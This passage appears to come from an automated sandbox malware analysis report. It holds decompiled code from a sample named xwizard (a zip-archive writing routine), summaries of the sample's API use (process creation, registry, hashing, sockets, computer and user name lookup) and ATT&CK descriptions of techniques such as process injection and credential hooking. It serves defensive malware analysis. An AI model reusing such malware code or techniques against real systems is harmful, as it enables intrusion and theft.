				signed int _v108;
				intOrPtr _v112;
				unsigned int _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				intOrPtr _v212;
				signed int _v216;
				char* _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				signed short _t267;
				signed int _t269;
				signed int _t277;
				signed int _t280;
				signed int _t283;
				void* _t292;
				signed int _t301;
				void* _t319;
				signed int _t330;
				signed int _t337;
				void* _t340;
				void* _t348;
				signed int _t349;
				intOrPtr _t352;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr _t365;
				void* _t370;
				signed int _t371;
				signed int _t385;
				intOrPtr _t391;
				signed int _t394;
				unsigned short _t399;
				signed int _t427;
				char* _t428;
				signed int _t434;
				signed int _t437;
				void* _t438;
				signed short _t439;
				signed int _t441;
				signed int _t442;
				char** _t445;
				char** _t446;
				char** _t447;

				_t445 =  &_v220;
				_t370 = _a4;
				_v88 = 0;
				_v86 = 0;
				_v128 = _a24;
				_t257 = _a28;
				_v164 = _a32;
				_v160 = _a36;
				if(_t257 < 0) {
					_t257 = 6;
				}
				_v148 = 1;
				_t434 = _t257 & 0x0000000f;
				_v108 = _t434;
				if(_t434 != 0) {
					_t385 = _t257 >> 0x0000000a & 0x00000001;
					_v148 = _t385;
				}
				if(_t370 == 0) {
					L30:
					return 0;
				} else {
					_t441 =  *(_t370 + 0x48);
					if(_t441 != 0 &&  *((intOrPtr*)(_t370 + 0x14)) == 2) {
						_v156 = _a16 != 0;
						if((_v156 & (_t385 & 0xffffff00 | _a12 == 0x00000000)) == 0 && _a8 != 0 && (_v128 == 0 || _a20 != 0) &&  *(_t370 + 0x10) != 0xffff && _v108 <= 0xa) {
							_t259 = _t257 & 0x00000400;
							_v104 = _t259;
							if(_t259 != 0) {
								__eflags = _v160;
								if(_v160 > 0) {
									goto L30;
								}
								L17:
								_t261 = E00414919(_a8);
								__eflags = _t261;
								if(_t261 == 0) {
									goto L30;
								}
								_v116 =  *_t370;
								_v112 =  *((intOrPtr*)(_t370 + 4));
								 *_t445 =  &_v60;
								L0041F6BC();
								_t371 =  &_v86;
								E00415FC6(_v60, _t371,  &_v88);
								asm("repne scasb");
								_t267 =  !(_t371 | 0xffffffff) - 1;
								__eflags = _t267 - 0xffff;
								_v132 = _t267;
								if(_t267 > 0xffff) {
									goto L30;
								}
								_t269 = E0041493A(_t370);
								__eflags =  *(_t370 + 0x10) - 0xffff;
								_t427 = _t269;
								if( *(_t370 + 0x10) == 0xffff) {
									goto L30;
								}
								_v140 = _t269;
								_v96 = 0;
								_v136 = 0;
								_v100 = _v132;
								asm("adc edx, 0x0");
								_v124 =  *_t370 + 0x4c;
								_v120 =  *((intOrPtr*)(_t370 + 4));
								asm("adc edx, [esp+0x74]");
								asm("adc edx, [esp+0x8c]");
								asm("adc edx, [esp+0x64]");
								__eflags = 0;
								if(0 > 0) {
									goto L30;
								}
								__eflags = _v132;
								_v124 = 0;
								if(_v132 == 0) {
									L26:
									_t277 = _v128 & 0x0000ffff;
									_t391 = _a4;
									_t374 = _t391 + _t277 + 0x2e + _v132;
									__eflags = _a8 - _t391 + _t277 + 0x2e + _v132;
									if(_a8 >= _t391 + _t277 + 0x2e + _v132) {
										L28:
										_t74 =  &(_a20[1]); // 0x3
										_t375 = _t74;
										__eflags = _t74 - _a24;
										if(_t74 <= _a24) {
											L31:
											__eflags = _v148;
											if(_v148 != 0) {
												L35:
												_t437 = 0;
												__eflags = 0;
												L36:
												_t428 = _t427 + 0x1e;
												 *_t445 = _t428;
												_t280 = E00414DC1(_t370, _v112, _v116, __eflags);
												__eflags = _t280;
												if(_t280 != 0) {
													asm("adc edx, [esp+0x7c]");
													_v140 = _v140 + _v116;
													_t283 =  *(_t370 + 0x20);
													_t394 =  *(_t370 + 0x24);
													__eflags = _t394 | _t283;
													if((_t394 | _t283) != 0) {
														asm("adc edx, 0xffffffff");
														__eflags = _v136 & _t394 | _v140 & _t283 + 0xffffffff;
														if((_v136 & _t394 | _v140 & _t283 + 0xffffffff) != 0) {
															_v228 = 0x1837;
															_v232 = 0x424620;
															 *_t445 = "(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0";
															L0041F7E4();
														}
													}
													asm("adc edx, [esp+0x7c]");
													_v156 =  &(_t428[_v116]);
													_v152 = 0;
													memset( &_v60, 0, 0x1e << 0);
													_t446 =  &(_t445[3]);
													_v228 = _v152;
													_v220 = _v132;
													_v224 = _a8;
													_v232 = _v156;
													 *_t446 =  *(_t370 + 0x44);
													_t292 =  *((intOrPtr*)(_t370 + 0x3c))();
													__eflags = _v132 - _t292;
													if(_v132 != _t292) {
														L49:
														_v232 = _t437;
														 *_t446 =  *(_t370 + 0x34);
														 *((intOrPtr*)(_t370 + 0x2c))();
														goto L30;
													} else {
														asm("adc edx, [esp+0x54]");
														__eflags = _v104;
														_v156 = _v100 + _v156;
														_v152 = _v96;
														if(_v104 != 0) {
															L44:
															__eflags = _v148;
															if(_v148 == 0) {
																__eflags = _a16;
																if(_a16 == 0) {
																	_v148 = 0;
																	_v144 = 0;
																	_t442 = 0;
																	__eflags = 0;
																	L53:
																	_v232 = _t437;
																	 *_t446 =  *(_t370 + 0x34);
																	 *((intOrPtr*)(_t370 + 0x2c))();
																	__eflags = _v144;
																	if(_v144 > 0) {
																		goto L30;
																	}
																	__eflags = _v152;
																	if(_v152 > 0) {
																		goto L30;
																	}
																	_t438 =  &_v60;
																	_t399 = _v86;
																	_v116 = _v88;
																	__eflags = _t442 - 1;
																	_t301 = memset(_t438, 0, 0x1e << 0);
																	_t447 =  &(_t446[3]);
																	asm("sbb eax, eax");
																	_v48 = _t399;
																	_v47 = _t399 >> 8;
																	_v60 = 0x50;
																	_v59 = 0x4b;
																	_v56 =  !_t301 & 0x00000014;
																	_v58 = 3;
																	_v52 = _t442;
																	_v57 = 4;
																	_v50 = _v116;
																	_v49 = _v116 >> 8;
																	E00414900( &_v46, _a40);
																	E00414900( &_v42, _v148);
																	E00414900( &_v38, _v164);
																	_v220 = 0x1e;
																	_v224 = _t438;
																	_v32 = 0;
																	_v31 = 0;
																	_v34 = _v132;
																	_v228 = _v136;
																	_v33 = _v132 >> 8;
																	_v232 = _v140;
																	 *_t447 =  *(_t370 + 0x44);
																	_t319 =  *((intOrPtr*)(_t370 + 0x3c))();
																	__eflags = _t319 - 0x1e;
																	if(_t319 != 0x1e) {
																		goto L30;
																	}
																	_v208 = _t442 & 0x0000ffff;
																	_v188 = _v124;
																	_v192 = _v136;
																	_v196 = _v140;
																	_v216 = _v144;
																	_v200 = _v86 & 0x0000ffff;
																	_v224 = _v160;
																	_v204 = _v88 & 0x0000ffff;
																	_v212 = _a40;
																	_v220 = _v148;
																	_v228 = _v164;
																	_v232 = _v128 & 0x0000ffff;
																	 *_t447 = _a20;
																	_t330 = E00416311(_t370, _v132 & 0x0000ffff, _a8);
																	__eflags = _t330;
																	if(_t330 == 0) {
																		goto L30;
																	}
																	_t253 = _t370 + 0x10;
																	 *_t253 =  &(1[ *(_t370 + 0x10)]);
																	__eflags =  *_t253;
																	 *_t370 = _v156;
																	 *((intOrPtr*)(_t370 + 4)) = _v152;
																	return 1;
																}
																_v228 = 0;
																_v232 = 0xfffffff1;
																_v84 = _t370;
																_v68 = 0;
																_v76 = _v156;
																_v72 = _v152;
																_v64 = 0;
																 *_t446 = _v108;
																_v224 = E0041A99E();
																_v232 = E00416018;
																 *_t446 = _t437;
																_v228 =  &_v84;
																_t337 = E0041A64C();
																__eflags = _t337;
																if(_t337 == 0) {
																	_v224 = 4;
																	 *_t446 = _t437;
																	_v228 = _a16;
																	_v232 = _a12;
																	_t340 = E0041A5F0();
																	__eflags = _t340 != 1;
																	if(_t340 != 1) {
																		goto L49;
																	}
																	_t442 = 8;
																	_v148 = _v68;
																	_v144 = _v64;
																	_v156 = _v76;
																	_v152 = _v72;
																	goto L53;
																}
																goto L49;
															}
															L45:
															_v220 = _a16;
															_v228 = _v152;
															_v224 = _a12;
															_v232 = _v156;
															 *_t446 =  *(_t370 + 0x44);
															_t348 =  *((intOrPtr*)(_t370 + 0x3c))();
															__eflags = _a16 - _t348;
															if(_a16 != _t348) {
																goto L49;
															}
															_t349 = _a16;
															_v156 = _v156 + _t349;
															asm("adc [esp+0x54], edx");
															__eflags = _v104 - 1;
															_v144 = 0;
															_v148 = _t349;
															asm("sbb ebp, ebp");
															_t442 =  !_t441 & 0x00000008;
															goto L53;
														}
														 *_t446 = 0;
														_v228 = _a16;
														_v232 = _a12;
														_t352 = E004171DA();
														__eflags = _a16 - 3;
														_a40 = _t352;
														_v160 = 0;
														_v164 = _a16;
														if(_a16 <= 3) {
															goto L45;
														}
														goto L44;
													}
												}
												_v232 = _t437;
												_v132 = _t280;
												 *_t445 =  *(_t370 + 0x34);
												 *((intOrPtr*)(_t370 + 0x2c))();
												return _v132;
											}
											__eflags = _v156;
											if(_v156 == 0) {
												goto L35;
											}
											_v228 = 0x4df40;
											_v232 = 1;
											 *_t445 =  *(_t370 + 0x34);
											_t360 =  *((intOrPtr*)(_t370 + 0x28))();
											__eflags = _t360;
											_t437 = _t360;
											if(__eflags != 0) {
												goto L36;
											}
											goto L30;
										}
										 *_t445 = 1;
										_t362 = E00416134(_t370, _t375,  &_a16);
										__eflags = _t362;
										if(_t362 != 0) {
											goto L31;
										}
										goto L30;
									}
									 *_t445 = 1;
									_t364 = E00416134(_t370, _t374, _t441);
									__eflags = _t364;
									if(_t364 == 0) {
										goto L30;
									}
									goto L28;
								}
								_t365 = _a8;
								_t439 = _v132;
								__eflags =  *((char*)(_t365 + _t439 - 1)) - 0x2f;
								if( *((char*)(_t365 + _t439 - 1)) != 0x2f) {
									goto L26;
								}
								__eflags = _v164 | _v160;
								if((_v164 | _v160) != 0) {
									goto L30;
								}
								__eflags = _v156;
								if(_v156 != 0) {
									goto L30;
								}
								_v124 = 0x10;
								goto L26;
							}
							if((_v160 | _v164) == 0) {
								goto L17;
							}
						}
					}
					goto L30;
				}
			}

APIs

time.MSVCRT ref: 0041C9C4

Part of subcall function 00415FC6: localtime.MSVCRT ref: 00415FDA

_assert.MSVCRT ref: 0041CBC3

Strings

P, xrefs: 0041CE70
FB, xrefs: 0041CBB4
K, xrefs: 0041CE78

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assertlocaltimetime
String ID: FB$K$P
API String ID: 239888755-1627385504
Opcode ID: cd97700670ffc604625be893ed21d500fd9a320e9f0d6e3cdad60bc31f370bed
Instruction ID: 8e089169dfaa1868ebee7eec05d644c009e56557b81e72ef4d504278135b65ea
Opcode Fuzzy Hash: cd97700670ffc604625be893ed21d500fd9a320e9f0d6e3cdad60bc31f370bed
Instruction Fuzzy Hash: 9222BF7494D3818FD720CF29C58579BBBE1BF88704F14892EE89887351E7B8E885CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00408C65, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00408C81
malloc.MSVCRT ref: 00408D36
malloc.MSVCRT ref: 00408D91

Strings

@, xrefs: 00408DEB
:, xrefs: 00408DFB

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: malloc
String ID: :$@
API String ID: 2803490479-1367939426
Opcode ID: 92bcfbf36f97e7b9ce3a5bb17cc0fb52a2a6fa959f7768e43986a6bb5ba9e5b6
Instruction ID: ef4ad269280774ff2184a95f10acb59d81b6a7d54bd4368cac39de452cc0daf6
Opcode Fuzzy Hash: 92bcfbf36f97e7b9ce3a5bb17cc0fb52a2a6fa959f7768e43986a6bb5ba9e5b6
Instruction Fuzzy Hash: 975128B05087009FD310EF29D58425ABBE0FF88718F41892EF5D887291D7B8958ACF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B016, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 0040B056
fread.MSVCRT ref: 0040B080
fclose.MSVCRT ref: 0040B0F3

Strings

z3B, xrefs: 0040B091

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fclosefopenfread
String ID: z3B
API String ID: 2679521937-3399381272
Opcode ID: e2600f1d5f8662e9c392fe55e0e07e3544c7b57ce058911e094c9610cb459c02
Instruction ID: 2438fad20f86bae77410323f418e8e562921bdaa67428cf1c8451c05b399b209
Opcode Fuzzy Hash: e2600f1d5f8662e9c392fe55e0e07e3544c7b57ce058911e094c9610cb459c02
Instruction Fuzzy Hash: 9B213EB05493459ED310AF65C5843AFBBE0EF80348F01883EE8E887341D77C8589DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00414470, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61processthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00406F1A: MultiByteToWideChar.KERNEL32 ref: 00406F53
Part of subcall function 00406F1A: GetFileAttributesW.KERNEL32 ref: 00406F5E

Part of subcall function 00407E8C: fopen.MSVCRT ref: 00407E9F
Part of subcall function 00407E8C: fread.MSVCRT ref: 00407EC7
Part of subcall function 00407E8C: fclose.MSVCRT ref: 00407ED4

CreateProcessA.KERNEL32 ref: 0041451B

Part of subcall function 00408AF3: ReleaseMutex.KERNEL32(?,?,?,?,?,?,0041452C), ref: 00408B02
Part of subcall function 00408AF3: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0041452C), ref: 00408B10

Part of subcall function 00405999: shutdown.WS2_32 ref: 004059B6
Part of subcall function 00405999: closesocket.WS2_32(00000000), ref: 004059C2

ResumeThread.KERNEL32 ref: 00414542
ExitProcess.KERNEL32 ref: 00414552

Strings

D, xrefs: 004144A8

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Process$AttributesByteCharCloseCreateExitFileHandleMultiMutexReleaseResumeThreadWideclosesocketfclosefopenfreadshutdown
String ID: D
API String ID: 3751753202-2746444292
Opcode ID: f8650b9407d0b2bd35c033e0c183c6fdc47d0c7d8f843b636e5c65679c480df3
Instruction ID: 067f5d9187edf2fa4930e283bd60014924ca834b1665164d65a9df55d347b5cc
Opcode Fuzzy Hash: f8650b9407d0b2bd35c033e0c183c6fdc47d0c7d8f843b636e5c65679c480df3
Instruction Fuzzy Hash: C721B0B05087419AD710AF66C59976FBBE0BF80348F01881EE5D85B382D7BD8489CF9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D420, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D290: CryptAcquireContextA.ADVAPI32 ref: 0040D2E2
Part of subcall function 0040D290: CryptCreateHash.ADVAPI32 ref: 0040D31C
Part of subcall function 0040D290: CryptHashData.ADVAPI32 ref: 0040D34B
Part of subcall function 0040D290: CryptGetHashParam.ADVAPI32 ref: 0040D38A

Part of subcall function 00407F7A: LoadLibraryA.KERNEL32 ref: 00407F84

Part of subcall function 00407F8E: GetProcAddress.KERNEL32 ref: 00407FA0

RegQueryValueExA.ADVAPI32 ref: 0040D4EC
LocalFree.KERNEL32 ref: 0040D5B8

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

Strings

8B, xrefs: 0040D58B

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$AcquireAddressContextCreateDataFreeLibraryLoadLocalParamProcQueryValue_vsnprintf
String ID: 8B
API String ID: 2081058215-1803290843
Opcode ID: 5a86b60eb7b24f86e885ff524fb9dc5150f0e0451a94be218f3f5f5105dd560d
Instruction ID: 3ebc2064e8f7268df4b8e6a934d6e56f21a9b96c1547cc96c36b4704c4ff52fe
Opcode Fuzzy Hash: 5a86b60eb7b24f86e885ff524fb9dc5150f0e0451a94be218f3f5f5105dd560d
Instruction Fuzzy Hash: 78419CB4A083419FD710EF69C58465AFBF0BF85358F00892EE8C897351EB79D588CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00405811, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

send.WS2_32 ref: 00405878
recv.WS2_32 ref: 004058B7

Strings

.B, xrefs: 004058C7

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _vsnprintfrecvsend
String ID: .B
API String ID: 2169655391-2011479308
Opcode ID: 2ec24ba702f98473ee5d9a715ab26bdcf3092223efe4a5c028eb6e3fbd3b2434
Instruction ID: 44476910b367cb1c2704fc52ca41c1ffc0a5ae24bf239666488ca44df54fa44d
Opcode Fuzzy Hash: 2ec24ba702f98473ee5d9a715ab26bdcf3092223efe4a5c028eb6e3fbd3b2434
Instruction Fuzzy Hash: 4111E2B1409301AED310AF29D58935FFBE0FF84354F51882EE4D897251D7788989DF96

Uniqueness

Uniqueness Score: -1.00%

Function 00413040, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32 ref: 0041307E
WideCharToMultiByte.KERNEL32 ref: 004130C0

Strings

@, xrefs: 00413099

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharComputerMultiNameWide
String ID: @
API String ID: 4013585866-2766056989
Opcode ID: 75619ece23197e83586e66bb1f33d7f654c3ffc02ea5a6723a4e8ea35ab2e647
Instruction ID: 7c038244dc2cd29586230534efa33881c9182a2f6df97460e627dabf8a714e70
Opcode Fuzzy Hash: 75619ece23197e83586e66bb1f33d7f654c3ffc02ea5a6723a4e8ea35ab2e647
Instruction Fuzzy Hash: 4F01C5B0409301AEE320AF26D99476BFBE4EF94714F10891EF49847291D3B985898B87

Uniqueness

Uniqueness Score: -1.00%

Function 004130E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00413112
WideCharToMultiByte.KERNEL32 ref: 00413154

Strings

@, xrefs: 0041312D

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharMultiNameUserWide
String ID: @
API String ID: 2949824840-2766056989
Opcode ID: 09c9c0a9f06fa941f3f5a46c28196dba5f2fafc07f774812d3ae38cfce7fc380
Instruction ID: 75a62b7ad59212d7e7d3757252a2119b8f15ada3fb68da9ed8f134ad780259a0
Opcode Fuzzy Hash: 09c9c0a9f06fa941f3f5a46c28196dba5f2fafc07f774812d3ae38cfce7fc380
Instruction Fuzzy Hash: 830108B0409341AED320AF26D94479BFBE4BBD4714F008A1EE49847290D37985498B97

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

